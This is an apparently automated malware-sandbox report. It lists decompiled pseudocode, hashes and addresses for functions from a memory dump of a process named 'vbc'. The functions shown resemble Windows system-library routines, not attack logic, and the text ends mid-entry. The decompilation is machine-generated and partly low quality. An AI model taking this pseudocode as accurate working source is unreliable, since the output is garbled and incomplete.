                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 13e165d071006b5f0839ecec06995449f7f4de9d447707d1bb551b99c82265e8
                                                  • Instruction ID: ec32959b68c1b03c4db0c419b731d8e0cdc195c513b7af20998eff85048fbe98
                                                  • Opcode Fuzzy Hash: 13e165d071006b5f0839ecec06995449f7f4de9d447707d1bb551b99c82265e8
                                                  • Instruction Fuzzy Hash: 5D018871A00209ABDB14DBA9D845FAFB7B8EF85700F40406ABA019B380DA709911C795
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 01688A62 Relevance: .0, Instructions: 44COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 54%
                                                  			E01688A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x16ad360 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c20;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E015D7D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E015FB640(E015F9AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                                  0x01688a62
                                                  0x01688a71
                                                  0x01688a79
                                                  0x01688a82
                                                  0x01688a85
                                                  0x01688a89
                                                  0x01688a8c
                                                  0x01688a8f
                                                  0x01688a92
                                                  0x01688a95
                                                  0x01688a9f
                                                  0x01688ab1
                                                  0x01688aa1
                                                  0x01688aaa
                                                  0x01688aaa
                                                  0x01688abc
                                                  0x01688abd
                                                  0x01688abf
                                                  0x01688ac4
                                                  0x01688ada

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: dfc4b8a5cc908618f8fbf3ce86803aed1b43861f44827a8ad64273795a965fbe
                                                  • Instruction ID: 608c50381f7cae6d4e404de1ae381830e1c2c6e674325e8da19dd6b55b7021e2
                                                  • Opcode Fuzzy Hash: dfc4b8a5cc908618f8fbf3ce86803aed1b43861f44827a8ad64273795a965fbe
                                                  • Instruction Fuzzy Hash: 3B012C71A0021DAFCB00EFA9D9419AEBBB8FF59310F50405AFA05EB381D634A911CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 01688ED6 Relevance: .0, Instructions: 44COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 54%
                                                  			E01688ED6(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				short _v62;
				char _v68;
				signed char* _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t42;
				signed int _t43;

				_t40 = __edx;
				_v8 =  *0x16ad360 ^ _t43;
				_v28 = __ecx;
				_v62 = 0x1c2a;
				_v36 =  *((intOrPtr*)(__edx + 0xc8));
				_v32 =  *((intOrPtr*)(__edx + 0xcc));
				_v20 =  *((intOrPtr*)(__edx + 0xd8));
				_v16 =  *((intOrPtr*)(__edx + 0xd4));
				_v24 = __edx;
				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
				if(E015D7D50() == 0) {
					_t29 = 0x7ffe0386;
				} else {
					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v68);
				_push(0x1c);
				_push(0x20402);
				_push( *_t29 & 0x000000ff);
				return E015FB640(E015F9AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
			}


















                                                  0x01688ed6
                                                  0x01688ee5
                                                  0x01688eed
                                                  0x01688ef0
                                                  0x01688efa
                                                  0x01688f03
                                                  0x01688f0c
                                                  0x01688f15
                                                  0x01688f24
                                                  0x01688f27
                                                  0x01688f31
                                                  0x01688f43
                                                  0x01688f33
                                                  0x01688f3c
                                                  0x01688f3c
                                                  0x01688f4e
                                                  0x01688f4f
                                                  0x01688f51
                                                  0x01688f56
                                                  0x01688f69

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f7c5be0de692b145205cf2fe1259c02cc06e149161e8185bcb8d6cfff325ada2
                                                  • Instruction ID: 0d8d23af76b16fbc3b0f592d439a2abb8a90a28309ca438bfd4bdadbcaad9d28
                                                  • Opcode Fuzzy Hash: f7c5be0de692b145205cf2fe1259c02cc06e149161e8185bcb8d6cfff325ada2
                                                  • Instruction Fuzzy Hash: 4E11127090020ADFDB14DFA9D941BAEB7F4FF48300F4442AAE519EB741D6349940CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015BDB60 Relevance: .0, Instructions: 43COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E015BDB60(signed int __ecx) {
				intOrPtr* _t9;
				void* _t12;
				void* _t13;
				intOrPtr _t14;

				_t9 = __ecx;
				_t14 = 0;
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
					_t13 = 0xc000000d;
				} else {
					_t14 = E015BDB40();
					if(_t14 == 0) {
						_t13 = 0xc0000017;
					} else {
						_t13 = E015BE7B0(__ecx, _t12, _t14, 0xfff);
						if(_t13 < 0) {
							L015BE8B0(__ecx, _t14, 0xfff);
							L015D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
							_t14 = 0;
						} else {
							_t13 = 0;
							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
						}
					}
				}
				 *_t9 = _t14;
				return _t13;
			}







                                                  0x015bdb64
                                                  0x015bdb66
                                                  0x015bdb6b
                                                  0x015bdbaa
                                                  0x015bdb71
                                                  0x015bdb76
                                                  0x015bdb7a
                                                  0x015bdba3
                                                  0x015bdb7c
                                                  0x015bdb87
                                                  0x015bdb8b
                                                  0x01614fa1
                                                  0x01614fb3
                                                  0x01614fb8
                                                  0x015bdb91
                                                  0x015bdb96
                                                  0x015bdb98
                                                  0x015bdb98
                                                  0x015bdb8b
                                                  0x015bdb7a
                                                  0x015bdb9d
                                                  0x015bdba2

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                  • Instruction ID: 22e0e0b25722a56cc7a14be5d5cbbf8fed01c92df174ab5de381645b61302d82
                                                  • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                  • Instruction Fuzzy Hash: D0F0C8332015239BD7325BD988C0BEBB6A5BFD1B64F1A0435F2059F344CE6488028BD4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015BB1E1 Relevance: .0, Instructions: 42COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E015BB1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(E015D7D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(E015D7D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return E01637016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}






                                                  0x015bb1e8
                                                  0x015bb1ea
                                                  0x015bb1f3
                                                  0x01614a17
                                                  0x015bb1f9
                                                  0x015bb1f9
                                                  0x015bb1f9
                                                  0x015bb201
                                                  0x01614a21
                                                  0x01614a2e
                                                  0x00000000
                                                  0x00000000
                                                  0x01614a3b
                                                  0x01614a4d
                                                  0x01614a3d
                                                  0x01614a46
                                                  0x01614a46
                                                  0x01614a55
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x015bb20a
                                                  0x015bb20a
                                                  0x015bb20a
                                                  0x015bb20a

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                  • Instruction ID: a0432d380449d383f47223810e7d7beb5d82f1cd2312dfefbce60c6165b56b8f
                                                  • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                  • Instruction Fuzzy Hash: BC016D376006809BD322976DC844FA9BB99FF92754F0D44A1FE158F6AADBB9D800C315
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0164FE87 Relevance: .0, Instructions: 38COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 46%
                                                  			E0164FE87(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_v8 =  *0x16ad360 ^ _t35;
				_v16 = __ecx;
				_v54 = 0x1722;
				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
				_v28 =  *((intOrPtr*)(__ecx + 4));
				_v20 =  *((intOrPtr*)(__ecx + 0xc));
				if(E015D7D50() == 0) {
					_t21 = 0x7ffe0382;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E015FB640(E015F9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}
















                                                  0x0164fe96
                                                  0x0164fe9e
                                                  0x0164fea1
                                                  0x0164fead
                                                  0x0164feb3
                                                  0x0164feb9
                                                  0x0164fec3
                                                  0x0164fed5
                                                  0x0164fec5
                                                  0x0164fece
                                                  0x0164fece
                                                  0x0164fee0
                                                  0x0164fee1
                                                  0x0164fee3
                                                  0x0164fee8
                                                  0x0164fefb

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2bb8d66b0680991375fdd47dee03d7bffd23cf16b47b58b4760324ec178383e7
                                                  • Instruction ID: b4d0f46260ded522593476f0852203a7b62aea8a3662e8b38a8c53c97768e12c
                                                  • Opcode Fuzzy Hash: 2bb8d66b0680991375fdd47dee03d7bffd23cf16b47b58b4760324ec178383e7
                                                  • Instruction Fuzzy Hash: A8016270A0020AEFCB14DFA8D941A6EB7F4FF48704F504199B505DF382D635E901CB41
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0167131B Relevance: .0, Instructions: 36COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 48%
                                                  			E0167131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x16ad360 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(E015D7D50() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E015FB640(E015F9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















                                                  0x0167131b
                                                  0x0167132a
                                                  0x01671330
                                                  0x01671336
                                                  0x0167133e
                                                  0x01671341
                                                  0x01671344
                                                  0x0167134f
                                                  0x01671361
                                                  0x01671351
                                                  0x0167135a
                                                  0x0167135a
                                                  0x0167136c
                                                  0x0167136d
                                                  0x0167136f
                                                  0x01671374
                                                  0x01671387

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4a53e7b878a41958f5ce665249668da63cd557e0c1cc7a8a588b90d13cbea849
                                                  • Instruction ID: 3674c9c06b68f751e00a532bcbffa999823e94c52b57bc12fa7030a6e7796d73
                                                  • Opcode Fuzzy Hash: 4a53e7b878a41958f5ce665249668da63cd557e0c1cc7a8a588b90d13cbea849
                                                  • Instruction Fuzzy Hash: BC013C71A0120DAFCB04EFA9D945AAEB7F4FF59700F40405AB945EB381E674AA10CB54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 01688F6A Relevance: .0, Instructions: 36COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 48%
                                                  			E01688F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x16ad360 ^ _t32;
				_v16 = __ecx;
				_v50 = 0x1c2c;
				_v24 = _a4;
				_v20 = _a8;
				_v12 = __edx;
				if(E015D7D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x402);
				_push( *_t18 & 0x000000ff);
				return E015FB640(E015F9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















                                                  0x01688f6a
                                                  0x01688f79
                                                  0x01688f81
                                                  0x01688f84
                                                  0x01688f8b
                                                  0x01688f91
                                                  0x01688f94
                                                  0x01688f9e
                                                  0x01688fb0
                                                  0x01688fa0
                                                  0x01688fa9
                                                  0x01688fa9
                                                  0x01688fbb
                                                  0x01688fbc
                                                  0x01688fbe
                                                  0x01688fc3
                                                  0x01688fd6

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 771a64acdd09261e706c66ce0b3f1c573ebf6ac279c3f6cb500372f17a460517
                                                  • Instruction ID: f29992fac09fcb7e3e0a38959da740c1c178040638aae9e944818836ae3aeba3
                                                  • Opcode Fuzzy Hash: 771a64acdd09261e706c66ce0b3f1c573ebf6ac279c3f6cb500372f17a460517
                                                  • Instruction Fuzzy Hash: F4014F74A0020DEFDB00EFA8D945AAEB7F4FF58300F504059BA05EB380EA74EA10CB94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 01671608 Relevance: .0, Instructions: 34COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 46%
                                                  			E01671608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t15;
				intOrPtr _t21;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_t26 = __edx;
				_v8 =  *0x16ad360 ^ _t29;
				_v12 = _a4;
				_v20 = __ecx;
				_v16 = __edx;
				_v46 = 0x1024;
				if(E015D7D50() == 0) {
					_t15 = 0x7ffe0380;
				} else {
					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v52);
				_push(0xc);
				_push(0x20402);
				_push( *_t15 & 0x000000ff);
				return E015FB640(E015F9AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
			}














                                                  0x01671608
                                                  0x01671617
                                                  0x0167161d
                                                  0x01671625
                                                  0x01671628
                                                  0x0167162b
                                                  0x01671636
                                                  0x01671648
                                                  0x01671638
                                                  0x01671641
                                                  0x01671641
                                                  0x01671653
                                                  0x01671654
                                                  0x01671656
                                                  0x0167165b
                                                  0x0167166e

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d452904bae5c93152140d64c7d7967f57fcd4192a9ba24887c56c919676b52e8
                                                  • Instruction ID: 0a52ba4e2f19cbb9c09b96c97d93be6b49549320df11e1bbb0722b8350b86aad
                                                  • Opcode Fuzzy Hash: d452904bae5c93152140d64c7d7967f57fcd4192a9ba24887c56c919676b52e8
                                                  • Instruction Fuzzy Hash: B2F06271A00259EFDB14EFA9D805A6EB7F4FF59300F444059BA05EB381E634DA00CB54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015DC577 Relevance: .0, Instructions: 33COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E015DC577(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E015DC5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x15911cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					__eflags = _a4;
					if(__eflags != 0) {
						L10:
						E016888F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags == 0) {
						goto L10;
					}
					goto L9;
				} else {
					return 1;
				}
			}









                                                  0x015dc577
                                                  0x015dc57d
                                                  0x015dc581
                                                  0x015dc5b5
                                                  0x015dc5b9
                                                  0x015dc5ce
                                                  0x015dc5ce
                                                  0x015dc5ca
                                                  0x00000000
                                                  0x015dc5ca
                                                  0x015dc5c4
                                                  0x015dc5c8
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x015dc5ad
                                                  0x00000000
                                                  0x015dc5af

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e8f4a0d8b9b2771f344d1c37d888b1a7e66920614b18179a2189b8df076dd33c
                                                  • Instruction ID: c7f705a8a90a438261f15f9f513f1443e9c534a873d4b7f8b81c1e210cf5976a
                                                  • Opcode Fuzzy Hash: e8f4a0d8b9b2771f344d1c37d888b1a7e66920614b18179a2189b8df076dd33c
                                                  • Instruction Fuzzy Hash: ACF02EB28126A19FE732C32CC104B2A7FEABB16231FC4886FD4078F202C2A0C880C340
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 01672073 Relevance: .0, Instructions: 32COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 94%
                                                  			E01672073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = E0166FD22(__ecx);
				_t19 =  *0x16a849c - _t3; // 0x20fd2f70
				if(_t19 == 0) {
					__eflags = _t17 -  *0x16a8748; // 0x0
					if(__eflags <= 0) {
						E01671C06();
						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0x16a8724 & 0x00000004;
							if(( *0x16a8724 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0x16a8724; // 0x0
					return E01668DF1(__ebx, 0xc0000374, 0x16a5890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}







                                                  0x01672076
                                                  0x01672078
                                                  0x0167207d
                                                  0x01672083
                                                  0x016720a4
                                                  0x016720aa
                                                  0x016720ac
                                                  0x016720b7
                                                  0x016720ba
                                                  0x016720bc
                                                  0x016720c9
                                                  0x016720c9
                                                  0x016720d0
                                                  0x016720d2
                                                  0x00000000
                                                  0x016720d2
                                                  0x016720be
                                                  0x016720c3
                                                  0x016720c5
                                                  0x016720c7
                                                  0x00000000
                                                  0x00000000
                                                  0x016720c7
                                                  0x016720bc
                                                  0x016720d4
                                                  0x01672085
                                                  0x01672085
                                                  0x016720a3
                                                  0x016720a3

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3748b4661eddcd32ce855f3a3db9f592793433a1b514a20c7748029bfc874090
                                                  • Instruction ID: 2a95b2d888d3335a2895145c27739d62650731416b5dfe7aeee14839077191e2
                                                  • Opcode Fuzzy Hash: 3748b4661eddcd32ce855f3a3db9f592793433a1b514a20c7748029bfc874090
                                                  • Instruction Fuzzy Hash: 9AF027674251954ADF335B283D202E53F9AD7A5110B59108DD45017305C63898A3CF34
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015F927A Relevance: .0, Instructions: 32COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 54%
                                                  			E015F927A(void* __ecx) {
				signed int _t11;
				void* _t14;

				_t11 = L015D4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
				if(_t11 != 0) {
					E015FFA60(_t11, 0, 0x98);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
					 *((intOrPtr*)(_t11 + 0x24)) = 1;
					E015F92C6(_t11, _t14);
				}
				return _t11;
			}





                                                  0x015f9295
                                                  0x015f9299
                                                  0x015f929f
                                                  0x015f92aa
                                                  0x015f92ad
                                                  0x015f92ae
                                                  0x015f92af
                                                  0x015f92b0
                                                  0x015f92b4
                                                  0x015f92bb
                                                  0x015f92bb
                                                  0x015f92c5

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                  • Instruction ID: f170b46acca887d73a86c82bc1a7f4da95c1a35d626898f0a2f4f77eab518f19
                                                  • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                  • Instruction Fuzzy Hash: 2AE06D32240A426BE721AF5ADC84B5776A9BFD2725F04407DBA045E282CAE6D91987A0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 01688D34 Relevance: .0, Instructions: 32COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 43%
                                                  			E01688D34(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x16ad360 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(E015D7D50() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E015FB640(E015F9AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}













                                                  0x01688d34
                                                  0x01688d43
                                                  0x01688d4b
                                                  0x01688d4e
                                                  0x01688d52
                                                  0x01688d5c
                                                  0x01688d6e
                                                  0x01688d5e
                                                  0x01688d67
                                                  0x01688d67
                                                  0x01688d79
                                                  0x01688d7a
                                                  0x01688d7c
                                                  0x01688d81
                                                  0x01688d94

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: be01803ed5aa6d9c9e51ee73917abe1eb46daa48999c419db4f94417178b2ab0
                                                  • Instruction ID: 6678eb9df3ecb053a8eab8f1f56fd143dd34b66d2363872366383d6ea949923a
                                                  • Opcode Fuzzy Hash: be01803ed5aa6d9c9e51ee73917abe1eb46daa48999c419db4f94417178b2ab0
                                                  • Instruction Fuzzy Hash: 46F05471A046099FDB14FFB9D945B6E77B8FF58700F508099EA05EB391DA34D900CB54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 01688B58 Relevance: .0, Instructions: 31COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 36%
                                                  			E01688B58(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x16ad360 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E015D7D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E015FB640(E015F9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                                                  0x01688b67
                                                  0x01688b6f
                                                  0x01688b72
                                                  0x01688b7d
                                                  0x01688b8f
                                                  0x01688b7f
                                                  0x01688b88
                                                  0x01688b88
                                                  0x01688b9a
                                                  0x01688b9b
                                                  0x01688b9d
                                                  0x01688ba2
                                                  0x01688bb5

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
